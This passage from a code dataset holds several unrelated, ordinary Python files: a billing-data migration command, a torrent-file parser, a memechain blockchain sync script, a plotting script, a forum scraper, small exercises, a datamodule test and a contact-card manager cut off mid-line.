{"seq_id":"5378561","text":"from dependencies_graph.evaluation.spans_dependencies_to_logical_form_tokens import SpansDepToQDMRStepTokensConverter\nfrom dependencies_graph.extractors import *\n\n\n###################\n# spans_extractor #\n###################\nspans_extractor = FromFileSpansExtractor('datasets/Break/QDMR/train_spans.json',\n                                         'datasets/Break/QDMR/dev_spans.json')\n\n\n#################################\n# tokens_dependencies_extractor #\n#################################\n# steps_dependencies_extractor = PatternBasedStepsDependenciesExtractor()\nsteps_dependencies_extractor = LogicalFormBasedStepsDependenciesExtractor()\nspans_dependencies_extractor = MergeSpansDependenciesExtractor(spans_extractor, steps_dependencies_extractor)\nspans_dependencies_collapsers = [\n    # make sure step ids are sequential (in case of removed nodes)\n    ToSequentialIdsCollapser(),\n    # make sure we fall back to the proper dependency type on unwind\n    ToDependencyTypeCollapser(),\n\n    MissingResourcesCollapser(),\n    # LastStepCollapser(create_separate_span=True),\n\n    # single to dup\n    # PreSingleToMultipleStepsCollapser(),  # works only with NotAlignedCollapser\n    DupSingleToMultipleStepsCollapser(count=5),\n\n    # JoinCollapser(),\n    # 
ConcatCollapser(),\n NotAlignedDumCollapser(count=5),\n\n AddOperatorsPropertiesCollapser(),\n]\ntokens_dependencies_extractor = TokensDependenciesExtractor(spans_dependencies_extractor, spans_dependencies_collapsers)\n\n###############################\n# tokens dependencies to QDMR #\n###############################\nspans_to_qdmr_converter = RuleBasedSpansDepToQdmrConverter()\ntokens_dependencies_to_qdmr_extractor = SpansBasedTokensDependenciesToQDMRExtractor(spans_to_qdmr_converter,\n tokens_dependencies_extractor)\n\n\n########\n# Eval #\n########\nspans_dependencies_to_logical_form_converter = SpansDepToQDMRStepTokensConverter(infer_properties=False)","sub_path":"dependencies_graph/config/config_default.py","file_name":"config_default.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"614652179","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\nimport json\nimport logging\nimport MySQLdb as mdb\n\nfrom django.conf import settings\nfrom django.core.management.base import NoArgsCommand\n\nfrom billing_proxy.api import keystone\nfrom billing_proxy import models\n\nLOG = logging.getLogger(__name__)\n\nCACHE_KEY_PRODUCTS = \"products\"\n\n\ndef product_item_modify_floatingip(product_item):\n [product_item.remove(item) for item in product_item\n if item[\"name\"] == \"ipAddress\"]\n\n\ndef get_parent_user(username):\n user_list = keystone.list_user(username=username)\n for user in user_list:\n if getattr(user, 'parent_user_id', None):\n try:\n parent_user = keystone.user_get(user.parent_user_id)\n return parent_user.name\n except Exception:\n return False\n else:\n return username\n else:\n return False\n\n\ndef update_parent_user_name(brobj):\n parent_user_name = get_parent_user(brobj.user_name)\n if parent_user_name:\n LOG.info(\"Updating user {0} ,\"\n \"parent user user: {1}\".format(brobj.user_name,\n parent_user_name))\n brobj.parent_user_name = parent_user_name\n return True\n else:\n return False\n\n\ndef update_billing_resource_parent_user(mig):\n rows = models.BillingResources.objects.filter(\n **{\"resource_id\": mig.resource_id, \"parent_user_name__isnull\":\n True})\n for row in rows:\n if update_parent_user_name(row):\n row.save()\n\n\ndef update_billing_resources(mig):\n BillingResources = models.BillingResources\n LOG.info(\"updating BillingResources %s\" % mig.resource_id)\n\n product_item = json.loads(\"[\" + str(mig.product_item) + \"]\")\n formated_product_item = [dict(map(lambda x: (str(x), str(item[x])), item))\n for item in product_item]\n\n if mig.BACK_RESOURCE_CODE == \"fixedBandwidth\":\n product_item_modify_floatingip(formated_product_item)\n update_spec = {\"contract_id\": mig.contract_id,\n \"product_name\": mig.BACK_RESOURCE_CODE,\n \"product_item\": json.dumps(formated_product_item)}\n if mig.cycle:\n if mig.cycle == \"C0Y\":\n period = \"year\"\n update_spec.update({\"period\": period})\n elif mig.cycle == \"C0M\":\n period = \"month\"\n update_spec.update({\"period\": period})\n elif mig.cycle == \"C0D\":\n period = \"day\"\n update_spec.update({\"period\": period})\n elif mig.cycle == \"C0H\":\n period = \"hour\"\n update_spec.update({\"period\": period})\n\n BillingResources.objects.select_for_update().filter(\n **{\"resource_id\": mig.resource_id}).update(\n **update_spec)\n\n\ndef update_billing_resource_order(mig):\n BillingResourceOrder = models.BillingResOrder\n LOG.info(\"updating BillingResourceOrder %s\" % 
mig.resource_id)\n row_nums = BillingResourceOrder.objects.select_for_update().filter(\n **{\"resource_id\": mig.resource_id}).update(\n **{\"contract_id\": mig.contract_id})\n\n if str(row_nums) == \"0\":\n try:\n res_obj = models.BillingResources.objects.get(\n resource_id=mig.resource_id)\n except Exception:\n LOG.info(\"resource %s not existed in bill_res\" % mig.resource_id)\n return\n if mig.order_state == \"OSD\":\n return\n BillingResourceOrder(contract_id=mig.contract_id,\n resource_type=mig.BACK_RESOURCE_CODE,\n account=res_obj.user_name,\n resource_id=mig.resource_id).save()\n\n\ndef update_billing_recycle_resources(mig):\n RecycleResources = models.RecycleResources\n LOG.info(\"updating RecycleResources %s\" % mig.resource_id)\n RecycleResources.objects.select_for_update().filter(\n **{\"resource_id\": mig.resource_id,\n \"contract_id__isnull\": True}).update(\n **{\"contract_id\": mig.contract_id})\n\n\ndef load_data():\n sql = \"\"\"select contract_id, resource_id, order_id, contract_code,\n product_item,\n offer_id, BACK_RESOURCE_CODE,\n order_state, offer_name,\n cycle, create_date, idc_id from mig_order_agree_map\n \"\"\"\n cursor, connection = get_cursor(sql)\n for row in result_iter(cursor):\n mig = APIDictWrapper(row)\n update_billing_resources(mig)\n update_billing_resource_order(mig)\n update_billing_resource_parent_user(mig)\n update_billing_recycle_resources(mig)\n connection.close()\n\n\ndef result_iter(cursor):\n \"\"\"An iterator that uses fetchmany to keep memory usage down\"\"\"\n while True:\n results = cursor.fetchmany(1000)\n if not results:\n break\n for result in results:\n yield result\n\n\nclass APIDictWrapper(object):\n \"\"\"Simple wrapper for api dictionaries\n\n Some api calls return dictionaries. This class provides identical\n behavior as APIResourceWrapper, except that it will also behave as a\n dictionary, in addition to attribute accesses.\n\n \"\"\"\n\n _apidict = {} # Make sure _apidict is there even in __init__.\n\n def __init__(self, apidict):\n self._apidict = apidict\n\n def __getattribute__(self, attr):\n try:\n return object.__getattribute__(self, attr)\n except AttributeError:\n if attr not in self._apidict:\n raise\n return self._apidict[attr]\n\n def __getitem__(self, item):\n try:\n return getattr(self, item)\n except AttributeError as e:\n # caller is expecting a KeyError\n raise KeyError(e)\n\n def get(self, item, default=None):\n try:\n return getattr(self, item)\n except AttributeError:\n return default\n\n def __repr__(self):\n return \"<%s: %s>\" % (self.__class__.__name__, self._apidict)\n\n def to_dict(self):\n return self._apidict\n\n\ndef get_cursor(sql):\n try:\n connection = initialize_db()\n cursor = get_raw_data(connection, sql)\n except (AttributeError, mdb.OperationalError):\n connection = initialize_db()\n cursor = get_raw_data(connection, sql)\n return cursor, connection\n\n\ndef get_raw_data(connection, sql):\n \"\"\"get data from bss datasource\"\"\"\n\n LOG.info(\"Start executing: \" + str(\n datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")) + \"\\n\" + sql)\n cursor = connection.cursor()\n cursor.execute(sql)\n return cursor\n\n\ndef initialize_db(charsets=\"utf8\"):\n\n connection = mdb.connect(settings.DATABASES[\"default\"][\"HOST\"],\n settings.DATABASES[\"default\"][\"USER\"],\n settings.DATABASES[\"default\"][\"PASSWORD\"],\n settings.DATABASES[\"default\"][\"NAME\"],\n charset=charsets,\n cursorclass=mdb.cursors.DictCursor)\n return connection\n\n\nclass Command(NoArgsCommand):\n help = \"import bss 
resource_contract data into BP database\"\n\n def handle(self, **option):\n load_data()\n","sub_path":"billing_proxy/management/commands/migration_data.py","file_name":"migration_data.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"397984671","text":"\nimport re\nimport os\n\nfrom datetime import datetime\n\n# Inheriting from object creates a \"new-style\" class (post 2.1).\n# Among other things, this enables properties (example below - creation_date)\n# and descriptors.\nclass PyTorrent(object):\n \"\"\"Provide a simple interface to bencoded bittorrent files.\n\n http://www.bittorrent.org/beps/bep_0003.html\n http://wiki.theory.org/BitTorrentSpecification\n\n Keyword arguments\n * path: the path to the bittorrent file\n\n Exposed information\n * created_by: the client that created the torrent\n * creation_date: the date on which the torrent was created\n * comment: any comment included with the torrent\n \n * announce: a list of lists of trackers\n * private: 1 indicates torrent is tracked by private tracker\n\n * files: file information by file path\n * pieces: a list of 20-byte SHA1 hash values\n * piece_length: the length of each piece\n\n \"\"\"\n\n def __init__(self, path):\n self.torrent_file = path\n\n self.torrent_data = {}\n tor_file_len = os.path.getsize(self.torrent_file)\n with open(self.torrent_file, 'r') as f:\n self.parse(f.read(tor_file_len))\n\n data = self.torrent_data\n\n self.created_by = data.get(\"created by\", \"\")\n self.creation_date = data.get(\"creation date\", \"\")\n self.comment = data.get(\"comment\", \"\")\n \n # For convenience, create same data structure (list of lists)\n # for both announce and announce-list\n self.announce = data.get(\"announce-list\", [[data['announce']]])\n\n self.files = {}\n self.generateFileList()\n\n info = data['info']\n pieces = bytearray(info['pieces'])\n self.pieces = [ pieces[i:i+20] for i in range(0, len(pieces), 20) ]\n self.piece_length = info['piece length']\n self.private = info.get(\"private\", 0)\n self.name = info['name']\n\n self.creation_date = property(self.getDate, self.setDate, doc=\"The date this torrent was created.\")\n\n def getDate(self):\n return self._creation_date.strftime(\"%a. %b. %d, %Y %H:%M\")\n\n def setDate(self, value):\n self._creation_date = datetime.fromtimestamp(value)\n\n def __del__(self):\n pass\n\n def __str__(self):\n return (\"File: {filename}\\n\"\n \"Name: {name}\\n\"\n \"Date: {date}\\n\"\n \"Client: {client}\\n\"\n \"Tracker(s){private}: {tracker}\\n\"\n \"Comment: {comment}\\n\").format(\n filename=self.torrent_file,\n name=self.name,\n client=self.created_by,\n date=self.creation_date,\n tracker=self.announce,\n private=(\" (private)\" if self.private else \"\"),\n comment=self.comment)\n\n def generateFileList(self):\n \"\"\"Populates the files member.\n The idea here is to provide identical data structures regardless\n of whether this torrent is single or multiple file.\n \"\"\"\n info = self.torrent_data['info']\n name = info['name']\n if \"files\" in info:\n # Prepend \"name\" (of directory) to file path\n self.files = dict((\"{0}/{1}\".format(name, '/'.join(f['path'])), f)\n for f in info['files'])\n else:\n # Ok, I know what you're thinking. This is kinda bad. I did it\n # just for fun. Two things: 1) I wanted to conditionally add the\n # \"md5sum\" key, hence the comprehension. 
2) In order to match the\n # multiple file structure above, the \"name\" key had to change to\n # \"path\".\n self.files = { name:\n dict(((key if key != \"name\" else \"path\"), info[key])\n for key in (\"name\", \"length\", \"md5sum\")\n if key in info) }\n\n # Providing the regex as a default parameter argument keeps it from being\n # recompiled on recursive calls.\n def parse(self, string, i=0, reg=re.compile(\"([idle])|(\\d+):|(-?\\d+)\")):\n \"\"\"Populate the torrent_data member by recursively parsing an arbitrarily\n complex bencoded structure.\n \"\"\"\n result = []\n while i < len(string):\n match = reg.match(string, i)\n m_str = match.group(match.lastindex)\n i = match.end()\n if match.lastindex == 1:\n if m_str in (\"d\", \"l\"):\n i, r = self.parse(string, i, reg)\n if m_str == \"d\":\n r = dict(zip(r[0::2], r[1::2]))\n result.append(r)\n elif m_str == \"e\":\n return (i, result)\n elif match.lastindex == 2:\n result.append(string[i:i + int(m_str)])\n i += int(m_str)\n else:\n result.append(int(m_str))\n i += 1\n\n self.torrent_data = result[0]\n\n\n__all__ = ['PyTorrent']\n\n","sub_path":"pytorrent.py","file_name":"pytorrent.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264957511","text":"from logger import *\nimport os\nimport json\nimport pickle as pickle\nimport time\nfrom lib.db import MemeChainDB\nfrom lib.blockchain import *\nfrom lib.memechain import MemeTx, Validate\nfrom lib.ipfs import IPFSTools\nimport psutil\n\n# Load configuration file\nwith open(\"config.json\", \"r\") as f:\n config = json.loads(f.read())\n\nclass GenesisMeme(MemeTx):\n def __init__(self):\n # Genesis Meme Constants\n self.genesis_ipfs_id = 'QmUNCRjfvVts5kdxNJTQvTABE8AKPUFDyYsjqefFj2bEbG'\n self.genesis_kekcoin_block = 947594\n self.genesis_txid = '36ee54a262ee65ca54e41baf1298cc7f6aa1f3c6a29fb79c4ab75582ee6ec9af'\n self.genesis_author = 'KVsKHQbuoKUgHNaFm4jZKZVHDAKPPCvwbr'\n self.genesis_img_format = 'jpg'\n\n self.ipfs_id = self.genesis_ipfs_id\n self.generate_genesis_hashlink()\n\nclass MemechainParser(object):\n \"\"\"\n Wrapper class for various blockchain parsing functions\n used to construct the local memechain metadata database\n \"\"\"\n\n def __init__(self, block_height):\n self.block_height = block_height\n self.memetxs = []\n\n def collect_memetxs(self):\n \"\"\"\n Method used to parse the op_return data\n for the transactions in the block\n \"\"\"\n block_txs = get_block_txs(self.block_height)\n\n for txid in block_txs:\n memetx, author = get_op_return_data(txid)\n \n if memetx:\n self.parse_memetx(memetx, txid, author)\n\n def parse_memetx(self, memetx, txid, author):\n \"\"\"\n Method used to parse the raw memetx metadata\n \"\"\"\n # Identifier\n if memetx[:4] == '3ae4':\n # Command bytes\n if memetx[4:6] =='00':\n\n ipfs_id = memetx[6:][:len(memetx) - 6 - 16]\n hashlink = memetx[6:][len(memetx) - 6 - 16:]\n\n self.memetxs.append({\n 'ipfs_id': ipfs_id,\n 'hashlink': hashlink,\n 'txid' : txid,\n 'author' : author\n })\n\n def return_memetxs(self):\n \"\"\"\n Method used to return the potentially valid memetxs\n\n Returns:\n Memetxs at block_height (array)\n \"\"\"\n return self.memetxs\n\ndef sync_block(db, block):\n parser = MemechainParser(block)\n parser.collect_memetxs()\n memetxs = parser.return_memetxs()\n\n if memetxs:\n prev_block_memes = db.get_prev_block_memes()\n\n for meme in memetxs:\n memetx = MemeTx(meme['ipfs_id'])\n memetx.generate_hashlink(prev_block_memes)\n 
memetx.txid = meme['txid']\n            Validate(memetx, db=db, ipfs_dir=config['DATA_DIR'],\n                     prev_block_memes=prev_block_memes, sync=True)\n            valid_state = memetx.is_meme_valid()\n            if valid_state == -1:\n                meme_filepath = IPFSTools().get_meme(meme['ipfs_id'], config['DATA_DIR'])\n                ext = meme_filepath.split(\".\")[-1]\n\n                if db.search_by_ipfs_id(meme['ipfs_id']):\n                    db.update_meme(meme['ipfs_id'], block)\n                    logger.info('COMMAND %s Success %s: %s' % (\n                        'Sync', 'Memechain', \"Meme %s updated in database.\" % meme['ipfs_id']))\n                else:\n                    db.add_meme(**{\"ipfs_id\": meme['ipfs_id'], \"hashlink\": meme['hashlink'],\n                                   \"txid\": meme['txid'], \"author\": meme['author'], \"block\": block, \"imgformat\": ext, \"status\": \"confirm\"})\n                    logger.info('COMMAND %s Success %s: %s' % ('Sync', 'Memechain', \"Meme %s added to database.\" % meme['ipfs_id']))\n            elif valid_state != 3:\n                meme_filepath = IPFSTools().get_meme(meme['ipfs_id'], config['DATA_DIR'])\n                os.remove(meme_filepath)\n                logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Invalid MemeTx %s.\" % meme['ipfs_id'])) \n\n    else:\n        if config[\"ENABLE_LOG_MEMTX_NOT_FOUND\"]:\n            logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"No Meme TXs found in block %s.\" % block))\n\ndef check_files_status(db):\n    for file in os.listdir(config['DATA_DIR']):\n        if file.endswith(tuple(config[\"ALLOWED_IMAGE_EXTENSIONS\"])):\n            if db.search_by_ipfs_id(file.split(\".\")[0]) is None:\n                os.remove(os.path.join(config['DATA_DIR'], file))\n                logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Removed file from data folder (not in db) %s.\" % file))\n\n    for meme in db.get_all_memes():\n        if not os.path.isfile(os.path.join(config['DATA_DIR'], meme[\"ipfs_id\"] + \".\" + meme[\"imgformat\"])):\n            logger.info('COMMAND %s Failed %s: %s' % (\n                'Sync', 'Memechain', \"File not found in data folder (exists in db) %s.\" % meme[\"ipfs_id\"]))\n            ipfs = IPFSTools()\n            ipfs.get_meme(meme[\"ipfs_id\"], config['DATA_DIR'])\n            logger.info('COMMAND %s Info %s: %s' % ('Sync', 'Memechain', \"Trying to download missing file with id %s.\" % meme[\"ipfs_id\"]))\n\n\ndef check_running():\n    counter = 0\n    for q in psutil.process_iter():\n        # str.find() returns -1 (a truthy value) when there is no match, so the\n        # original q.name().find('sync') prefilter matched almost every process;\n        # check the command line directly instead.\n        if len(q.cmdline()) > 1 and 'sync.py' in q.cmdline()[1]:\n            counter = counter + 1\n    if counter > 1:\n        return True\n    else:\n        return False\n\n\n\nif __name__ == '__main__':\n    # Load database\n    db = MemeChainDB(os.path.join(config['DATA_DIR'], 'memechain.json'))\n\n\n\n    if not config[\"MULTIPLE_SYNC_RUNNING\"] and check_running():\n        logger.info('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Sync process already running. Shutting down current sync.\"))\n        sys.exit(1)\n\n    if config[\"CHECK_FILES_ON_RUNNING\"]:\n        check_files_status(db)\n\n    # Check blockheight\n    block_height = get_block_height()\n    \n    if db.get_memechain_height() == 0:\n        # Load genesis meme\n        genesis_meme = GenesisMeme()\n\n        memetx = MemeTx(genesis_meme.genesis_ipfs_id)\n        memetx.generate_genesis_hashlink()\n        memetx.txid = genesis_meme.genesis_txid\n        \n        Validate(memetx, db=db, ipfs_dir=config['DATA_DIR'],\n                 prev_block_memes=[], sync=True, genesis=True)\n        # Add genesis meme to database\n\n\n        db.add_meme(**{\"ipfs_id\": genesis_meme.get_ipfs_id(), \"hashlink\": genesis_meme.get_hashlink(),\n                       \"txid\": genesis_meme.genesis_txid, \"author\": genesis_meme.genesis_author, \"block\": genesis_meme.genesis_kekcoin_block, \"imgformat\": genesis_meme.genesis_img_format, \"status\": \"confirm\"})\n\n    # Sync loop\n        if genesis_meme.genesis_kekcoin_block < block_height:\n            block 
= genesis_meme.genesis_kekcoin_block + 1\n            max_errors = 0\n            while block < block_height + 1:\n                try:\n                    sync_block(db, block)\n                except IOError as e:\n                    logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Invalid ipfs multihash. %s\" % e))\n                    if max_errors < 10:\n                        time.sleep(10)\n                        block = block - 1\n                        max_errors = max_errors + 1\n                    else:\n                        max_errors = 0\n                except KeyboardInterrupt:\n                    # Dump current sync height into a pickle\n                    pickle.dump(block, open(os.path.join(config['DATA_DIR'], 'sync.p'), 'wb'))\n                block = block + 1\n\n        else:\n            logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Blockchain Error', \"Kekcoin blockchain syncing...\"))\n\n    else:\n        # Load last synced height\n        try:\n            synced_height = pickle.load(open(os.path.join(config['DATA_DIR'], 'sync.p'), 'rb'))\n        except IOError as e:\n            last_meme = db.get_last_meme()\n            synced_height = last_meme['block']\n\n        # Sync loop\n        \n        if synced_height-10 < block_height:\n            block = synced_height-10 + 1\n            max_errors = 0\n            while block < block_height + 1:\n                try:\n                    sync_block(db, block)\n                except IOError as e:\n                    logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Memechain', \"Invalid ipfs multihash. %s\" % e))\n                    if max_errors < 10:\n                        time.sleep(10)\n                        block = block - 1\n                        max_errors = max_errors + 1\n                    else:\n                        max_errors = 0\n                except KeyboardInterrupt:\n                    # Dump current sync height into a pickle\n                    pickle.dump(block, open(os.path.join(config['DATA_DIR'], 'sync.p'), 'wb'))\n                block = block + 1\n\n            # Dump current sync height into a pickle\n            pickle.dump(block_height, open(os.path.join(config['DATA_DIR'], 'sync.p'), 'wb'))\n\n        else:\n            logger.error('COMMAND %s Failed %s: %s' % ('Sync', 'Blockchain Error', \"Kekcoin blockchain syncing...\"))\n\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":9018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"345941864","text":"# %%\n# NOTE: __future__ imports must come before any other statement in the file.\nfrom __future__ import unicode_literals\n\nfrom fun import *\nimport matplotlib  # needed so that matplotlib.rcParams below resolves\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nmatplotlib.rcParams['text.usetex'] = True\nmatplotlib.rcParams['text.latex.unicode'] = True\n\ndirectory = '/home/astra/Documents/Faks/Magisterij/Paper/Slike_paper'\n\n#%%\nprimer_bulk = Chiral_bulk(10**4, 1.75, 0.25, 100., 0.1)\nsx_mat = np.load('%s/sx_mat1.npy'%directory)\nsy_mat = np.load('%s/sy_mat1.npy'%directory)\n\nt_vec = np.linspace(0., 100., int(100./0.1) + 1)\nk_vec = 2.*np.pi/10**4*np.linspace(0., 10**4-1., 10**4)\n\n#%%\ni_vec = [499, 500, 501]\n\nfig = plt.figure(figsize = (6, 6))\nfor num in range(3):\n    i = i_vec[num]\n    dx_vec = np.array([np.real(primer_bulk.h_mat(t_vec[i], k)[0][1]) for k in k_vec])\n    dy_vec = np.array([np.imag(primer_bulk.h_mat(t_vec[i], k)[1][0]) for k in k_vec])\n    dabs_vec = np.array([np.abs(primer_bulk.h_mat(t_vec[i], k)[0][1]) for k in k_vec])\n\n    dotprod_vec = (sx_mat[i]*dx_vec + sy_mat[i]*dy_vec)/dabs_vec\n\n    x_vec = dotprod_vec*dx_vec/dabs_vec\n    y_vec = dotprod_vec*dy_vec/dabs_vec\n\n    ax = fig.add_subplot(2, 2, num+1)\n    ax.set_title(u'Time $t = {}$'.format(round(i*0.1, 1)))\n    ax.plot(x_vec, y_vec)\n    ax.set_xlim(-1.1, 1.1)\n    ax.set_aspect('equal')\nfig.tight_layout()\n\n#%%\n#fig.savefig('{}/test1_b.pdf'.format(directory))\n\n# Also for the quench across the critical point and back!","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482052649","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Author: billx\n@Date: 
2018/9/19\n@Descript:\n\"\"\"\nimport re\n\n\ndef foo(param):\n    assert re.match('^[0-9]{1,10}$', param), 'param invalid.'\n    print(param)\n\n\nparam = '1237979797'\nfoo(param)\n\n\n","sub_path":"day21_assert.py","file_name":"day21_assert.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491738786","text":"\"\"\" Core scraper for bitcointalk.org. \"\"\"\nimport logging\nfrom bitcointalk import memoizer\nfrom bitcointalk import bitcointalk\n\nboardId = 14\n\nlogging.basicConfig(\n    level=logging.INFO,\n    format='%(asctime)s %(levelname)s:%(message)s',\n    datefmt='%m/%d/%Y %I:%M:%S %p')\n\nlogging.info(\"Beginning scrape of board ID {0}...\".format(boardId))\nboard = memoizer.scrapeBoard(boardId)\nlogging.info(\"Found {0} topic pages in board...\".format(\n    board['num_pages']))\n\nresult = []\n\nfor boardPageNum in range(1, board['num_pages'] + 1):\n    logging.info(\">Scraping page {0}...\".format(boardPageNum))\n    topics = memoizer.scrapeBoardTopics(boardId, boardPageNum)\n    for topic in topics:\n        creator = memoizer.scrapeMember(topic['creatorId'])\n        result.append({\"id\": topic['id'], \"name\": topic['name'], \"creator\":creator})\n    print(result)\n\nlogging.info(\"All done.\")\nlogging.info(\"Made {0} requests in total.\".format(bitcointalk.countRequested))\n","sub_path":"scrape_boards.py","file_name":"scrape_boards.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379997805","text":"fator = int(input(\"Enter a number to compute its factorial: \"))\n\nacumu = fator\nmulti = 1\n\nprint(\"Factorial {}! = \".format(fator), end='')\n\nwhile acumu > 0:\n    print(\"{}\".format(acumu), end=\"\")\n    print(\" x \" if acumu > 1 else ' = ', end='')\n    multi *= acumu\n    acumu -= 1\nprint(multi)\n","sub_path":"WHILE/Calculando_Fatorial2.0.py","file_name":"Calculando_Fatorial2.0.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"200536211","text":"import numpy as np\nfrom pytorch_lightning import seed_everything\n\nfrom pl_bolts.datamodules.sklearn_datamodule import SklearnDataModule\nfrom warnings import warn\n\ntry:\n    from sklearn.utils import shuffle as sk_shuffle\nexcept ImportError:\n    warn('You want to use `sklearn` which is not installed yet,'  # pragma: no-cover\n         ' install it with `pip install sklearn`.')\n\n\ndef test_dataloader(tmpdir):\n    seed_everything()\n\n    X = np.random.rand(5, 2)\n    y = np.random.rand(5)\n    x_val = np.random.rand(2, 2)\n    y_val = np.random.rand(2)\n    x_test = np.random.rand(1, 2)\n    y_test = np.random.rand(1)\n\n    shuffled_X, shuffled_y = sk_shuffle(X, y, random_state=1234)\n\n    # -----------------------------\n    # train\n    # -----------------------------\n    loaders = SklearnDataModule(X=X, y=y, val_split=0.2, test_split=0.2, random_state=1234)\n    train_loader = loaders.train_dataloader()\n    val_loader = loaders.val_dataloader()\n    test_loader = loaders.test_dataloader()\n    assert np.all(train_loader.dataset.X == shuffled_X[2:])\n    assert np.all(val_loader.dataset.X == shuffled_X[0])\n    assert np.all(test_loader.dataset.X == shuffled_X[1])\n    assert np.all(train_loader.dataset.Y == shuffled_y[2:])\n\n    # -----------------------------\n    # train + val\n    # -----------------------------\n    loaders = SklearnDataModule(X=X, y=y, x_val=x_val, y_val=y_val, test_split=0.2, random_state=1234)\n    train_loader = 
loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X[1:])\n assert np.all(val_loader.dataset.X == x_val)\n assert np.all(test_loader.dataset.X == shuffled_X[0])\n\n # -----------------------------\n # train + test\n # -----------------------------\n loaders = SklearnDataModule(X=X, y=y, x_test=x_test, y_test=y_test, val_split=0.2, random_state=1234)\n train_loader = loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X[1:])\n assert np.all(val_loader.dataset.X == shuffled_X[0])\n assert np.all(test_loader.dataset.X == x_test)\n\n # -----------------------------\n # train + val + test\n # -----------------------------\n loaders = SklearnDataModule(X, y, x_val, y_val, x_test, y_test, random_state=1234)\n train_loader = loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X)\n assert np.all(val_loader.dataset.X == x_val)\n assert np.all(test_loader.dataset.X == x_test)\n","sub_path":"tests/datamodules/test_sklearn_dataloaders.py","file_name":"test_sklearn_dataloaders.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"504581184","text":"user_list = [\r\n {'name': 'zhangsan', 'tel': '123', 'qq': '321'},\r\n {'name': 'lisi', 'tel': '666', 'qq': '999'},\r\n {'name': 'jack', 'tel': '888', 'qq': '233'}\r\n]\r\n\r\n\r\ndef add_user():\r\n name = input('请输入用户名:')\r\n for u in user_list:\r\n if u['name'] == name:\r\n print('用户名已经被占用')\r\n break\r\n else:\r\n tel = input('请输入手机号:')\r\n qq = input('请输入QQ号:')\r\n user = {'name': name, 'tel': tel, 'qq': qq}\r\n user_list.append(user)\r\n print(user_list)\r\n\r\n\r\ndef check_number(n):\r\n if n.isdigit():\r\n n = int(n)\r\n if 0 <= n < len(user_list):\r\n return True\r\n return False\r\n\r\n\r\ndef del_user():\r\n number = input('请输入要删除的序号(序号从0开始):')\r\n is_valid = check_number(number)\r\n if is_valid:\r\n answer = input('你确定要删除么?yes or no: ')\r\n if answer.lower() == 'yes':\r\n user_list.pop(int(number))\r\n else:\r\n print('输入的序号不合法')\r\n\r\n print(user_list)\r\n\r\n\r\ndef modify_user():\r\n number = input('请输入要修改的序号(序号从0开始):')\r\n if check_number(number):\r\n user = user_list[int(number)]\r\n # print('您要修改的信息是:\\n姓名:{},手机号:{},QQ号:{}'.format(user['name'], user['tel'], user['qq']))\r\n print('您要修改的信息是:\\n姓名:{name},手机号:{tel},QQ号:{qq}'.format(**user))\r\n new_name = input('请输入新的姓名:')\r\n for u in user_list:\r\n if u['name'] == new_name:\r\n print('新用户名已经存在')\r\n modify_user()\r\n return\r\n else:\r\n new_tel = input('请输入新的手机号:')\r\n new_qq = input('请输入新的QQ号:')\r\n if new_name == user['name'] and new_tel == user['tel'] and new_qq == user['qq']:\r\n print('信息未修改')\r\n else:\r\n user['name'] = new_name\r\n user['tel'] = new_tel\r\n user['qq'] = new_qq\r\n\r\n\r\ndef search_user():\r\n print('查询用户')\r\n\r\n\r\ndef show_all():\r\n print('显示所有名片')\r\n\r\n\r\ndef exit_system():\r\n answer = input('亲, 你确定要退出么?~~~~(> _ <)~~~~(yes or no)')\r\n return answer.lower() == 'yes'\r\n\r\n\r\ndef start():\r\n while True:\r\n print(\r\n \"---------------------------\\n名片管理系统 V1.0\\n1:添加名片\\n2:删除名片\\n3:修改名片\\n4:查询名片\\n5:显示所有名片\\n6:退出系统\\n---------------------------\")\r\n operator = input('请输入要进行的操作(数字):')\r\n if operator == '1':\r\n add_user()\r\n elif 
